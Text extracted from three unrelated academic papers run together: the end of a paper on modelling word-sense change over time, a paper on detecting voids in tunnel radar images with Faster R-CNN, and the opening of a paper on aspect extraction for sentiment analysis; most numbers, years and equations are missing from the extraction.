published results, without any ex- tensive feature engineering or task specific tuning. we conclude by discussing limitations of our model and directions for future work. in our exper- iments we fix the number of senses k for all words across all time periods. although this approach did not harm performance (even in case of semeval where we handled more than target concepts), it is at odds with the fact that words vary in their degree of ambiguity, and that word senses continu- ously appear and disappear. a non-parametric ver- sion of our model would infer an appropriate number of senses from the data, individually for each time period. also note that in our experiments we used context as a bag of words. it would be interesting to explore more systematically how different kinds of contexts (e.g., named entities, multiword expres- sions, verbs vs. nouns) influence the representations the model learns. furthermore, while scan cap- tures the temporal dynamics of word senses, it can- not do so for words themselves. put differently, the model cannot identify whether a new word is used which did not exist before, or that a word ceased to exist after a specific point in time. a model internal way of detecting word (dis)appearance would be de- sirable, especially since new terms are continuously being introduced thanks to popular culture and vari- ous new media sources. in the future, we would like to apply our model to different text genres and levels of temporal granular- ity. for example, we could work with twitter data, an increasingly popular source for opinion tracking, and use our model to identify short-term changes in word meanings or connotations. acknowledgments we are grateful to the anonymous reviewers whose feedback helped to substantially improve the present paper. we thank charles sutton and iain murray for helpful discussions, and acknowledge the support of epsrc through project grant ep/i / . references aitchison, jean. . language change: progress or decay?. cambridge approaches to linguis- tics. cambridge university press. biemann, chris. . chinese whispers - an effi- cient graph clustering algorithm and its appli- cation to natural language processing problems. in proceedings of textgraphs: the st workshop on graph based methods for natural language processing. new york city, ny, usa, pages – . bird, steven, ewan klein, and edward loper. . natural language processing with python. o’reilly media, inc., st edition. blei, david m. and john d. lafferty. a. cor- related topic models. in advances in neural in- formation processing systems , vancouver, bc, canada, pages – . blei, david m. and john d. lafferty. b. dy- namic topic models. in proceedings of the rd international conference on machine learning. pittsburgh, pa, usa, pages – . brody, samuel and mirella lapata. . bayesian word sense induction. in proceedings of the th conference of the european chapter of the acl. athens, greece, pages – . chambers, nathanael. . labeling documents with timestamps: learning from their time ex- pressions. in proceedings of the th annual meeting of the association for computational linguistics. jeju island, korea, pages – . chang, chih-chung and chih-jen lin. . libsvm: a library for support vector ma- chines. acm transactions on intelligent sys- tems and technology : : – : . software available at http://www.csie.ntu.edu. tw/˜cjlin/libsvm. chen, jianfei, jun zhu, zi wang, xun zheng, and bo zhang. . scalable inference for logistic- normal topic models. in advances in neural in- formation processing systems, lake tahoe, nv, usa, pages – . cook, paul, jey han lau, diana mccarthy, and timothy baldwin. . novel word-sense iden- tification. in proceedings of the th interna- tional conference on computational linguistics: technical papers. dublin, ireland, pages – . cook, paul and suzanne stevenson. . automat- ically identifying changes in the semantic orien- tation of words. in proceedings of the seventh international conference on language resources and evaluation. valletta, malta, pages – . davies, mark. . the corpus of historical american english: million words, - . available online at http://corpus. byu.edu/coha/. diller, hans-jürgen, hendrik de smet, and jukka tyrkkö. . a european database of descriptors of english electronic texts. the european english messenger ( ): – . fellbaum, christiane. . wordnet: an electronic lexical database. bradford books. groenewald, pieter c. n. and lucky mokgatlhe. . bayesian computation for logistic regres- sion. computational statistics & data analysis ( ): – . gulordava, kristina and marco baroni. . a dis- tributional similarity approach to the detection of semantic change in the google books ngram corpus. in proceedings of the workshop on geo- metrical models of natural language semantics. edinburgh, scotland, pages – . kilgarriff, adam. . simple maths for keywords. in proceedings of the corpus linguistics confer- ence. kim, yoon, yi-i chiu, kentaro hanaki, darshan hegde, and slav petrov. . temporal anal- ysis of language through neural language mod- els. in proceedings of the acl workshop on language technologies and computational so- cial science. baltimore, md, usa, pages – . kulkarni, vivek, rami al-rfou, bryan perozzi, and steven skiena. . statistically significant de- tection of linguistic change. in proceedings of the th international conference on world wide web. geneva, switzerland, pages – . lau, han jey, paul cook, diana mccarthy, span- dana gella, and timothy baldwin. . learn- ing word sense distributions, detecting unat- tested senses and identifying novel senses us- ing topic models. in proceedings of the nd annual meeting of the association for compu- tational linguistics. baltimore, md, usa, pages – . lau, jey han, paul cook, diana mccarthy, david newman, and timothy baldwin. . word sense induction for novel sense detection. in proceedings of the th conference of the eu- ropean chapter of the association for computa- tional linguistics. avignon, france, pages – . mcmahon, april m.s. . understanding lan- guage change. cambridge university press. mihalcea, rada and vivi nastase. . word epoch disambiguation: finding how words change over time. in proceedings of the th http://www.csie.ntu.edu.tw/~cjlin/libsvm http://www.csie.ntu.edu.tw/~cjlin/libsvm http://corpus.byu.edu/coha/ http://corpus.byu.edu/coha/ annual meeting of the association for computa- tional linguistics. jeju island, korea, pages – . mimno, david, hanna wallach, and andrew mc- callum. . gibbs sampling for logistic nor- mal topic models with graph-based priors. in nips workshop on analyzing graphs. vancouver, canada. mitra, sunny, ritwik mitra, suman kalyan maity, martin riedl, chris biemann, pawan goyal, and animesh mukherjee. . an automatic ap- proach to identify word sense changes in text me- dia across timescales. natural language engi- neering : – . mitra, sunny, ritwik mitra, martin riedl, chris biemann, animesh mukherjee, and pawan goyal. . that’s sick dude!: automatic identification of word sense change across different timescales. in proceedings of the nd annual meeting of the association for computational linguistics. balti- more, md, usa, pages – . ó séaghdha, diarmuid. . latent variable mod- els of selectional preference. in proceedings of the th annual meeting of the association for computational linguistics. uppsala, sweden, pages – . popescu, octavian and carlo strapparava. . be- hind the times: detecting epoch changes using large corpora. in proceedings of the sixth inter- national joint conference on natural language processing. nagoya, japan, pages – . popescu, octavian and carlo strapparava. . se- meval , task : diachronic text evaluation. in proceedings of the th international workshop on semantic evaluation (semeval ). denver, co, usa, pages – . ritter, alan, mausam, and oren etzioni. . a latent dirichlet allocation method for selec- tional preferences. in proceedings of the th annual meeting of the association for computa- tional linguistics. uppsala, sweden, pages – . rue, håvard and leonhard held. . gaussian markov random fields: theory and applica- tions. chapman & hall/crc monographs on statistics & applied probability. crc press. sagi, eyal, stefan kaufmann, and brady clark. . semantic density analysis: comparing word meaning across time and phonetic space. in proceedings of the workshop on geometrical models of natural language semantics. athens, greece, pages – . salaberri, haritz, iker salaberri, olatz arregi, and beñat zapirain. . ixagroupehudiac: a multiple approach system towards the di- achronic evaluation of texts. in proceedings of the th international workshop on semantic eval- uation (semeval ). denver, co, usa, pages – . stevenson, angus, editor. . the oxford english dictionary. oxford university press, third edi- tion. szymanski, terrence and gerard lynch. . ucd: diachronic text classification with char- acter, word, and syntactic n-grams. in pro- ceedings of the th international workshop on se- mantic evaluation (semeval ). denver, co, usa, pages – . tahmasebi, nina, thomas risse, and stefan di- etze. . towards automatic language evolu- tion tracking, a study on word sense tracking. in proceedings of the joint workshop on knowl- edge evolution and ontology dynamics (evodyn ). bonn, germany. wijaya, derry tanti and reyyan yeniterzi. . understanding semantic change of words over centuries. in proceedings of the inter- national workshop on detecting and exploiting cultural diversity on the social web. glasgow, scotland, uk, pages – . zampieri, marcos, alina maria ciobanu, vlad nic- ulae, and liviu p. dinu. . ambra: a rank- ing approach to temporal text classification. in proceedings of the th international workshop on semantic evaluation (semeval ). denver, co, usa, pages – . international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - research on the tunnel geological radar image flaw detection based on cnn li he school of computer science and engineering xi’an technological university xi’an, china e-mail: @qq.com wang yubian department of railway transportation control belarusian state university of transport , kirova street, gomel, republic of belarus e-mail: alika_wang@mail.ru abstract—tunnel geological radar image has been widely used in tunnel engineering quality detection for its advantages of fast, nondestructive, continuous detection, real-time imaging, intuitive data processing and high detection accuracy. however, the traditional defect detection method, which is judged by surveyors visually, consumes energy. in order to detect the quality of tunnel engineering accurately and quickly, an improved method of void defect detection based on faster rcnn (regional convolutional neural network) is proposed in depth learning. the image data of the tunnel geological radar is collected for annotation, which fills the blank of the defect data set in the tunnel engineering. through the method of this paper proposed, the feature extraction is optimized to improve the performance of the detection model, and the detection accuracy of the model is verified by expert knowledge. keywords-tunnel geological; radar image; flaw detection; cnn i. introduction there are a large number of tunnel projects in the construction project. the quality defects of the tunnel may affect the construction schedule, increase the engineering cost, damage the mechanical equipment and even endanger the lives of the constructor. geological radar detection method[ - ] is the mainstream method of tunnel lining detection at present, and has excellent performance in the detection of reinforcement and arch spacing, plain concrete structure, etc.[ ]. however, the traditional survey situation is that the site construction surveyors scan the survey images generated by radar equipment one by one according to their expert knowledge. this traditional method has a large workload, a large human factor, and a certain rate of omission and error. in recent years, with the continuous improvement of gpu, the field of deep learning is booming. in , hinton[ ] and other researcher proposed the concept of deep learning, using convolutional neural network (cnn) to learn features from data. in , in the imagenet image classification competition, alex krizhevsky's team proposed the deep convolutional neural network alexnet for the first time. alexnet won the champion with an accuracy rate of . % higher than the second place, which made people have a further understanding of the application of convolutional neural network in visual tasks. girshick r proposed the regional convolutional neural network (rcnn) model, which uses the selective search method to select candidate regions and uses multiple international journal of advanced network, monitoring and controls volume , no. , support vector machines to classify features, thus achieving target detection. in , girshick r proposed fast rcnn[ ], which is an improved version of rcnn and adopts roi pooling to share the parts with a large amount of calculation to improve the working efficiency of the whole model. later, ren improved again on the basis of the original network, introduced rpn layer, and designed a faster rcnn model[ ], aiming at the problem that the running time of extracting candidate feature regions was slow, which achieved good results. compared with artificially designed features, features extracted by convolutional neural network have better robustness and stronger semantic information, and great achievements have been made in computer vision fields such as face recognition[ - ], target detection, and speech recognition[ - ]. this paper selects faster rcnn network as the basic algorithm framework for tunnel gpr (ground penetrating radar) detection. the framework of faster rcnn network is introduced. however, if the original faster rcnn model is directly applied to the tunnel gpr detection in the actual scene, there may be two disadvantages: ) the data sets collected on site for training are relatively small, which may lead to incomplete learning of the learning model and easy over fitting[ ]. ) there are many interference factors in the tunnel, resulting in complex image features of the defect. at the same time, the radar images are all manually experienced by field surveyors, and there is no uniform standard, so the sharpness is quite different. it will cause rpn to produce more negative sample space, and the network model is difficult to converge[ ]. based on the above reasons, this paper proposed faster - rcnn model to expand original data sets, based on the data increase[ ] and combining with ga – rpn[ ] for an improvement in the target detection and evaluation index in giou on border regression optimization[ ], in order to overcome the above shortcomings, further improve the accuracy of tunnel geological radar image detection. ii. key technologies and equipment as a relatively mature geophysical prospecting method, geological radar method has the advantages of high resolution, fast detection speed, non-destructive and radar image visualization, etc., and has become the most important method for tunnel lining quality detection. there are obvious abnormal reactions to the defects of tunnel lining, such as local un-compactness, voidage, insufficient thickness and lack of reinforcement. a. technical principle different defects have different reflections in radar images. the electromagnetic waves emitted by gpr will generate reflection and refraction on the surface of the medium with different dielectric constants[ ]. the dielectric constants of common materials are shown in table below. table i. dielectric constants of common materials material dielectric constant velocity (mm/ns) atmosphere water concrete - - sand (dry) - - sand (wet) - - pitch - - international journal of advanced network, monitoring and controls volume , no. , reflection and refraction conform to the law of reflection and refraction. the energy of reflected wave and refracted wave depends on the reflection coefficient r and refracted coefficient t:     r ( ) in the above equation, ε and ε are the relative permittivity of the upper and lower media at the interface respectively. according to formula ( ), when the electromagnetic wave propagates to the interface with dielectric constant difference, the reflected electromagnetic wave energy will change, which is reflected in the radar image as positive and anti-peak anomalies. the defects in lining such as local un-compaction, voidage, insufficient thickness and lack of reinforcement have obvious dielectric differences with concrete, which provide a good geophysical foundation for the application of gpr. b. equipment the equipment of detection equipment of gpr system in the project is shown in figure . figure . gpr system detection equipment geological ground penetrating radar method is the use of high frequency electromagnetic wave transmitting antenna will be in the form of a pulse in the concrete surface emission to concrete, the concrete interface reflection and defects return to the surface, by the receiving antenna to receive the echo signal, the treatment of radar system, radar image, through the analysis of the radar image processing, the interpretation of the data on the basis of this, so as to achieve quality nondestructive testing of lining. its detection principle is shown in figure . figure . principles of geological radar detection international journal of advanced network, monitoring and controls volume , no. , c. the radar imaging profile profiles of gpr images are usually recorded in the form of pulse reflected waves, or in the form of gray or color profiles. in this way, the in-phase axis or the iso-gray line can be used to represent the underground reflector or the target body. on the waveform recording chart, waveforms are recorded in the vertical direction of the survey line at all measurement points, forming the radar imaging profile. in the tunnel lining detection, the voids mainly appear between the inner lining, the second lining and the surface layer. due to the large dielectric difference between the void and surrounding media, when the electromagnetic wave propagates between concrete and atmosphere, air and surrounding rock, it will generate two strong reflections at the upper and lower interfaces. because the electromagnetic wave in the air attenuation is small, and the concrete and air dielectric difference is large, so in the void to produce a strong multiple reflections, electromagnetic wave in the air medium propagation frequency is relatively high. at the upper interface of voids, the electromagnetic wave goes from concrete to the air medium. according to the law of reflection (formula ), the reflection coefficient is positive, showing a negative wave peak. at the gap interface, the reflection coefficient of electromagnetic wave from air to concrete medium is negative, showing a positive wave peak. the picture is as shown in figure . in the image, white is the strongest color of positive reflection and black is the strongest color of negative reflection. in theory, there is a gap defect and the radar image shows two sets of reflected signals. in the actual survey, the second reflection signal may be lost due to signal interference. figure . gpr image of tunnel ejection iii. convolutional neural networks convolutional neural networks (cnn) can use local operations to abstract the representations in a hierarchical way in image recognition [ ]. two key design ideas have driven the success of convolution architecture in computer vision. first, cnn uses the d structure of the image, and the pixels in adjacent areas are usually highly correlated. therefore, instead of using one-to-one connections between all pixel units (as most neural networks do), cnn can use local connections in packets. second, the cnn architecture relies on feature sharing, so each channel (that is, the output feature graph) is generated by convolution with the same filter at all locations. deep learning methods of convolutional neural network are mainly divided into single-stage (eg.sdd, yolo) and two-stage (eg.rcnn series). single-stage generates detections directly on the picture through international journal of advanced network, monitoring and controls volume , no. , calculation. two-stage extracts the proposal first, and then makes the second amendment based on the proposal. both are relatively single-stage fast, low precision. in this paper, it is proposed to use two-stage faster rcnn because of the high accuracy of two-stage[ ]. this paper adopts faster rcnn as the basic framework, as shown in figure . in fact, faster rcnn can be divided into four main contents: conv layers 隧道地质雷达图像 classifier roi pooling feature maps proposals region proposal network 隧道地质雷达图像 figure . structure chart faster rcnn ) convolutional layers. it is used to extract the features of un-blemishes on the gpr image. the input is the whole image and the output is the extracted features, which are called feature maps. ) region proposal network. it is used to recommend candidate regions; this network is used in place of the previous search selective. the input is an image (because the rpn network and fast rcnn share the same cnn here, so the input can also be considered feature maps), and the output is multiple candidate areas to filter out gaps in features and = perform a preliminary border regression. it shares the convolution feature of the whole graph with the detection network, solves the speed bottleneck of the original selective search method, and greatly improves the speed of target detection. ) roi pooling. its function is input different sizes and converted into output of fixed length, and the input and output are the same as roi pooling in faster rcnn. ) classification and regression. the output of this layer is the class of the fully connected neural network of candidate region, and the exact location of the candidate region in the image. the whole process is shown in figure . international journal of advanced network, monitoring and controls volume , no. , figure . structure chart of rpn iv. generating anchor -rpn regional anchor is an important cornerstone of target detection method at present. most good target detection algorithms rely on the anchors mechanism to evenly sample a given location in space with predefined sizes. there are two major problems in the process of generating anchor by the traditional two-stage anchor-based method: ) inefficient is low. the existing method makes sliding windows on the feature map and generates thousands of anchors. however, there are only a few objects in one picture, which leads too many negative samples. ) unreasonable a priori assumptions. when generating anchor, it is assumed that the scale of anchor or the length-width ratio is several fixed values. these values tend to change and change with the dataset. according to the above hamid rezatofighi proposed the guided anchor in . the guided anchor mechanism works as follows: the position and shape of the target can be represented by (x, y, w, h). (x, y) represents the coordinates of the object's position in space. if the box of the object is drawn on a given input picture, the following distribution can be obtained:      iyxhwpiyxpihwyxp ,,|,|,|,,,  ( ) there are two important information can be obtained from the above equation: ( ) the specific region of the object in the image; ( ) the size and proportion of the object are closely related to its location. the anchor generated model is therefore designed to contain two branches: one for positioning and one for shape prediction. a. anchor generation modules. that is position prediction module. the goal is to predict which regions should be used as the center points to generate the anchor, which is a dichotomy problem, to predict whether or not the object is the center. two branches were added to predict the confidence of each pixel (corresponding receptive field) on the feature graph, as well as the corresponding width and height. a target is considered a target if its confidence is greater than a specific domain value. obviously, the process of obtaining this proposal is different from that of sliding window, which can reduce a large number of negative samples (only one proposal can be generated by making more pixels on each feature map). in addition, since the width and height are also regressed by cnn, there is no scale for the object, and international journal of advanced network, monitoring and controls volume , no. , the width and height are compared to any prior assumptions. b. feature adaption modules. this module actually quotes from the idea of deformable convolution. firstly, the width and height of each point can be obtained by using the anchor generation module. the width and height are represented by a -channel characteristic graph, and then the offset field is obtained by convolving again on the -channel characteristic graph. finally, the offset field is applied to the characteristic graph. v. improve iou algorithm in the target detection, it depends on the regression of boundingbox coordinates to obtain accurate positioning effect. iou (intersection-over-union) is an important concept in target detection. in the anchor-based method, it is not only used to determine positive samples and negative samples, but also to evaluate the distance between the predictbox and ground-truth, or the accuracy of the predictbox. one of the better features about the iou is that it's scale insensitive. in the regression task, the most direct indicator to judge the distance between predict box and gt is the iou, but the loss used is not suitable. since loss cannot reflect the regression effect, iou can get different values according to different situations, which can most directly reflect the regression effect. but there are two problems with using iou directly as the loss function: a. if the two boxes do not intersect, by definition, iou= , it does not reflect the distance between them. at the same time, because loss= , there is no gradient return, no learning and training. b. the iou cannot accurately reflect the degree of coincidence between the two. as shown in figure below, iou is equal in all three cases, but their coincidence degree is different. the graph on the left has the best regression effect, while the graph on the right has the worst. figure . same border regression of iou to solve the above problems, rezatofighi, hamid and other researcher proposed giou in , and its algorithm formula for giou is as follows: algorithm : generalized intersection over union input:two random image: n rsba , output:giou . find the smallest target graph c that surrounds a and b,c satisfies the condition: n rsc  . ba ba iou    .   c bac iouougi   \ international journal of advanced network, monitoring and controls volume , no. , c. characteristics of giou ) similar to iou, giou is also a distance measure. as a loss function, l_{giou}= -giou, which meets the basic requirements of the loss function. ) giou is insensitive to scale. ) giou is the lower bound on iou, and in the case of wireless overlap between the two boxes, iou=giou. ) the value of iou is [ , ], but the value range of giou is symmetric [- , ]. according to the above formula, it can be seen that giou is always less than or equal to iou. in addition, for iou, its range is [ , ], while the range of giou is [− , ]. when the two shapes coincide completely, there is giou=iou= . when there is no overlap between the two shapes, iou= , and the subtraction is - . ) unlike the iou, which only focuses on the overlapping area, the giou not only focuses on the overlapping area, but also focuses on other non-overlapping areas, which can better reflect the coincidence degree of the two. since giou introduces c containing two shapes of a and b, it can still be optimized when a and b do not coincide. vi. experimental methods a. data to enhance compared with traditional images, the number of gdar images that can provide deep learning training is generally less, and the lack of data will lead to over fitting of the model. in order to ensure the generalization ability and recognition effect of the model after training, it is more important to improve the training performance of the deep learning method by means of data augmentation. the small manually labeled data set was taken as the initial sample, and the initial sample set was rotated and compound rotated, and all the operation results obtained were taken as the training data set after data enlargement. b. training methods after the data enhancement, the images of plain concrete and reinforced concrete were sent into the neural network to start the training model. faster - rcnn model training method using alternate optimization method (alternating optimization), it is divided into four steps. ) stage _rpn_train.pt rpn network was trained separately, and the trained void model was initialized with the model of imagenet, and the parameters were adjusted in an end to end manner. backbone+rpn+fast rcnn——>backbone +rpn +fast rcnn, backbone, rpn, parameter updating; ) stage _fast_rcnn_train.pt fast rcnn is a separate training detection network. proposals for training come from rpn net in step . the model initialization adopts the imagenet model. backbone+rpn +fast rcnn——>backbone +rpn +fast rcnn , backbone, fast rcnn, parameter updating; ) stage _rpn_train.pt the rpn model was initialized with the parameters of the second step fast rcnn, but the convolutional layer was fixed during the training and only the parameters belonging to rpn were adjusted. backbone +rpn +fast rcnn ——>backbone +rpn +fast rcnn , rpn, parameter updating; ) stage _fast_rcnn_train.pt keep the shared convolutional layer fixed; fine-tune the remaining parameters of fast rcnn with the proposals of the rpn output adjusted in step as input. backbone +rpn +fast rcnn backbone +rpn + fast rcnn , fast rcnn, parameter updating. the above four steps are shown in figure . international journal of advanced network, monitoring and controls volume , no. , figure . network model training process c. evaluation index the general formula for calculating the accuracy is: the number/total number of accurate classification × % [ ]. this paper uses traditional evaluation criteria accuracy: acc= (tp+tn)/ (tp+tn+fp+fn) precision: p= tp/ (tp+fp), the proportion of positive classes in the results after classification. recall: recall=tp/(tp+fn), the proportion of all positive examples divided into pairs. tp means that the positive sample is correctly identified as a positive sample. tn means that negative samples are correctly identified as negative samples. fp indicates that a negative sample is incorrectly identified as a positive sample. fn means that a positive sample is incorrectly identified as a negative sample. the identification criteria for identification of void in the tunnel lining in the image are defined as the type and location of void. the probability size and the coincidence degree of the identification box and the marker box are determined as empty. through the analysis of the sample situation, if the probability of the defect of the geology radar image and the giou reach more than %, the gap will be recognized. vii. conclusion in tunnel construction, geological radar is used to detect highway tunnel engineering, and the radar scanning result map can be used to realize advanced geological forecast, and the hidden danger of geological defects in the tunnel can be found. based on the analysis of the elation principle, a method based on faster rcnn is proposed in this paper to extract the position of the elation in the second lining. compared with the traditional identification method, this method has the characteristics of faster and higher accuracy. since this data set is only plain concrete and reinforced concrete, the scale of annotated data will be further expanded to enrich the diversity of samples to improve the performance of the model. references [ ] li wendi. analysis of gpr image features of tunnel lining defects. [j]. fujian building materials, ( ): - . [ ] zhang chi. research on detection of lining voids of reinforced concrete structures based on geological radar method [j]. railway survey, , ( ): - . [ ] liu jinlong, tan hailiang. application of geological radar in detecting soil defects [j]. engineering quality, , ( ): - . [ ] hinton g e, osindero s, teh y. a fast learning algorithm for deep belief nets [j]. neural computation, , : - . international journal of advanced network, monitoring and controls volume , no. , [ ] krizhevsky a, sutskeever i, hinton g e. imagenet classification with deep convolutional neural networks [j]. communications of the acm, , ( ): - . [ ] girshick r. fast r-cnn[c]// ieee international conference on computer vision (iccv), december - , , santiago, chile. new york: ieee, : - . [ ] ren s, he k, girshick r, et al. faster r-cnn: towards real time object detection with region proposal networks[j]. ieee transactions on pattern analysis and machine intelligence, , ( ): - . [ ] sun y, liang d, wang x g, et al. deepid : face recognition with very deep neural networks [j]. computer science, , ( ): - . [ ] luiz g h, robert s, luiz s o. written dependent feature learning for offine signature verification using deep convolutional neutral networks [j]. pattern recognition, ( ): - . [ ] abdelhamid o, mohamed a r, jiang h, et al. convolutional neural networks for speech recognition[j]. ieee/acm transactions on audio, speech, and language processing, , ( ): - . [ ] redmon j, divvala s, girshick r, et al. you only look once: unified, real-time object detection[c]//proceedings of the ieee conference on computer vision and pattern recognition, june - , , seattle, wa, usa. new york: ieee, - . [ ] du yuhong, dong chao-qun, etc. application of improved faster rcnn model in cotton fiber identification [j/ol]. advances in laser and optoelectronics: - [ - - ]. [ ] xu shoukun, wang yaru, gu yuwan etc. research on the detection of helmet wearing based on improved fasterrcnn [j/ol]. computer application research: - [ - - ]. [ ] song shang-ling,yang yang etc. pulmonary nodules detection algorithm based on faster-rcnn [j/ol]. chinese journal of biomedical engineering: - [ - - ]. [ ] wang j, chen k, yang s, et al. region proposal by guided anchoring [j]. . r ezatofighi h, tsoi n, gwak j y, et al. generalized intersection over union: a metric and a loss for bounding box regression [j]. . [ ] rezatofighi h, tsoi n, gwak j y, etc. generalized intersection over union: a metric and a loss for bounding box regression[j]. . [ ] zheng lifei, xiao lito, li xiaoqing. forward modeling and application of geological radar advance prediction [j]. communications science and technology, ( ): - . [ ] wu zhengwen. application of convolution neural network in image classification. chengdu: university of electronic science and technology of china, [ ] lin gang, wang bo etc. multi-target detection and positioning of power line inspection image based on improved faster-rcnn [j]. power automation equipment, , ( ): - . [ ] sainath tn, kingsbury b, saon g, et al. deep convolutional neural networks for large-scale speech tasks [j]. neural networks, , : - . a supervised scheme for aspect extraction in sentiment analysis using the hybrid feature set of word dependency relations and lemmas a supervised scheme for aspect extraction in sentiment analysis using the hybrid feature set of word dependency relations and lemmas bhavana r. bhamare and jeyanthi prabhu department of computer science and engineering, sathyabama institute of science and technology, chennai, tamilnadu, india department of information technology, sathyabama institute of science and technology, chennai, tamilnadu, india abstract due to the massive progression of the web, people post their reviews for any product, movies and places they visit on social media. the reviews available on social media are helpful to customers as well as the product owners to evaluate their products based on different reviews. analyzing structured data is easy as compared to unstructured data. the reviews are available in an unstructured format. aspect-based sentiment analysis mines the aspects of a product from the reviews and further determines sentiment for each aspect. in this work, two methods for aspect extraction are proposed. the datasets used for this work are semeval restaurant review dataset, yelp and kaggle datasets. in the first method a multivariate filter-based approach for feature selection is proposed. this method support to select significant features and reduces redundancy among selected features. it shows improvement in f -score compared to a method that uses only relevant features selected using term frequency weight. in another method, selective dependency relations are used to extract features. this is done using stanford nlp parser. the results gained using features extracted by selective dependency rules are better as compared to features extracted by using all dependency rules. in the hybrid approach, both lemma features and selective dependency relation based features are extracted. using the hybrid feature set, . % accuracy and . % f -score is achieved in the aspect category prediction task. subjects artificial intelligence, data mining and machine learning keywords feature extraction, aspect based sentiment analysis, machine learning, natural language processing, support vector machine introduction quick improvements in e-commerce websites lead customers to purchase and analyze products online. also, it allows end-users to express their views/opinions related to an item and services by means of reviews. these opinions are useful for other users to decide about the purchase of a product. these are also helpful to manufacturers to enhance the quality of their items and services and they may know what exactly customers want. in any case, it is hard for an individual to analyze a large number of reviews and rate them how to cite this article bhamare br, prabhu j. . a supervised scheme for aspect extraction in sentiment analysis using the hybrid feature set of word dependency relations and lemmas. peerj comput. sci. :e doi . /peerj-cs. submitted march accepted december published february corresponding author bhavana r. bhamare, kanawadebr@gmail.com academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright bhamare and prabhu distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:kanawadebr@�gmail.�com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ according to various aspects of the product. hence, it is required to analyze all users’ views and classify them with respect to different aspects. sentiment analysis (sa) has a significant role in analyzing and summarizing all the opinions. sa is the analysis of the reviews given by the people about any product on various e-commerce websites or social media, etc. sa can be done at different levels of granularity (hu & liu, ), they are aspect, sentence and document level. aspect level sa recognizes the polarity of each individual aspect of a product. it includes tasks like aspect term extraction and opinion target extraction etc. in sentence level sa, polarity is predicted for the complete sentence. it deals with the recognition of statements as objective or subjective, while in document level sa the polarity is predicted for the complete review or document. it extracts opinion bearing words and detects its polarity. the work in this paper focuses on absa. aspect is nothing but the component or attribute of the product. in other words, absa is a sa method that finds the aspects/attributes of a product and afterward designates an estimation level (positive, negative or neutral) to each attribute. the large distinction between sa and absa is that the former just distinguish the feeling of full text, while the latter breaks down every content to recognize different aspects and decide the relating sentiment for each one of them. aspects can be implicit or explicit based on the presence of aspect terms. statements with implicit aspects do not contain direct aspect terms. instead, we need to recognize it from the words or expressions expressed in the user reviews. the following two sentences are reviews about mobile phones. for a mobile phone, aspects can be a battery, camera, audio, memory, processing speed, etc. in sentence , the aspect term is a camera and the sentiment specifying word is “good” that is, sentiment is positive. in this sentence, the camera word is not used directly instead it is signified by the phrase “picture quality”. so the aspects may be specified explicitly or implicitly in the sentence. the implicit aspect in the second sentence is a battery which is represented by the word “charging”. sentence : the picture quality of this mobile is good. sentence : it does not need charging for a long time. this section focuses on exhaustive literature review which covers various aspects of contemporary area of research. the survey focuses on absa applications, aspect extraction and selection techniques suggested in earlier works, knowledge-based approaches to consider semantic features, topic-based methods for selecting features that are independent of the subject matter and deep cnn approach. absa analysis has a number of applications such as movie rating prediction, restaurant recommendation, financial news analysis (ahmad, cheng & almas, ), political predictions, etc. benkhelifa, bouhyaoui & laallam ( ) proposed a system that will rank numerous cooking recipes which helps to choose the finest by using reviews of users. this system also makes use of metadata of youtube videos and improves the performance. it has performed three tasks subjectivity detection, aspect extraction, and sentiment classification. for both subjectivity detection and sentiment classification, features are bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ selected using tf-idf feature weighting method and for classification nb and svm classifiers are used. in both, the svm algorithm outperforms the nb classifier. the aspect extraction is done with a rule-based approach using stanford dependency parser. akhtar et al. ( ) proposed a recommender system that endorses the best hotel for the user. in this approach, first, the topic modeling technique is used to recognize concealed data and aspects. further, the sentiment analysis is used on classified sentences and finally, summarization is done. for topic modeling, the mallet tool is used and sentiment analysis is done using the sentiwordnet corpus. as reviews are summarized based on aspect category, it gives a better understanding of the reviews. afzaal, usman & fong ( ) proposed a framework for mobile tourism app using absa. with pos tagger, the nouns and noun phrases are extracted seeing them as candidate features to decide aspect category. the co-referential aspects are clustered by means of wordnet and aspects with occurrence count more than are selected that assisted to extract explicit aspects. a decision tree approach is used to pull out implicit aspects. sentiment analysis is done using five different classifiers, amongst all nbm classifier shown good results with an accuracy of . % on the restaurant review dataset. vanaja & belwal ( ) and anand & naorem ( ) analyzed amazon customer surveys and amazon movie reviews, respectively. vanaja & belwal ( ) distinguished among naïve bayes and svm algorithm on sentiment analysis task. in it, features are extracted by applying part of speech tagging and selecting nouns, verbs, adverbs, adjectives, and pronouns from each review. frequent features are selected using the apriori algorithm. these features are pruned by removing stop words and then the classifiers are applied to determine the class labels as positive, negative or neutral. the nb classifier outperformed the svm with accuracy . %. anand & naorem ( ) performed absa in two stages: to detect aspect and determine sentiment for the aspect. the stanford dependency parser is applied using some handcrafted rules to extract aspect-sentiment pairs. the polarity of extracted sentiment words is determined using the sentiwordnet corpus. to detect the aspect some aspect clue words are used. these clue words are chosen by three approaches: manual labeling, clustering, and review guided clustering. el hannach & benkhalifa ( ) proposed crime identification using implicit aspects and it is done on the twitter dataset. this research is carried out in three main stages: implicit aspect sentence detection, implicit aspect term extraction and implicit aspect identification (iai). the features used for this work are adjectives and verbs along with its wordnet synonyms selected using term frequency-inverse class frequency (tf-icf). the classifiers used for iai are mnb, svm and rf. this work has shown that the usage of tf-icf achieves better compared to tf-idf. absa can be done using different approaches. many approaches focus on feature extraction and selection process. features can be selected using strategies like occurrence frequency, syntax-based rules, semantics or the hybrid approach. significant features are more supportive to predict the aspect category and sentiment class. a comparative study of numerous existing language rule-based aspect extraction methods is quantified by ruskanda, widyantoro & purwarianti ( ). observations demonstrate that the accuracy of a language rule-based aspect extraction technique is broadly resolved by the bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ completeness and accuracy of rules compared to other technologies. poria et al. ( ) proposed a dependency rule-based methodology to resolve the issue of aspect extraction from reviews of products. in this research, authors used stanford parser to get the dependency tree and further some dependency rules are applied to mine aspects from a sentence. this work indicates significant improvement as it works on the extraction of relevant features. rana & cheah ( a), rana & cheah ( b) and rana & cheah ( ) worked on ruled based methods for extracting product features. rana & cheah ( a) presented a two-fold 